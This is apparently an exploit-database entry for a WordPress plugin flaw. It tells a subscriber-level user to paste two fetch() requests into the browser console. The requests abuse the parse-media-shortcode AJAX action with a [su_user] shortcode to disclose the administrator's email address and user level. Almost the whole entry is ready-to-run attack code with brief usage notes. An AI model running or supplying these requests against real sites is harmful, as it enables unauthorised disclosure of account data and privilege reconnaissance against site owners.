Share
## https://sploitus.com/exploit?id=WPEX-ID:35404D16-7213-4293-AC0D-926BD6C17444
Run one of the below commands in the developer console of the web browser while being on the blog as a subscriber

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[su_user field='user_email' user_id='1']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

This will display the email of the admin

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": "action=parse-media-shortcode&shortcode=[su_user field='wp_user_level' user_id='1']",
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));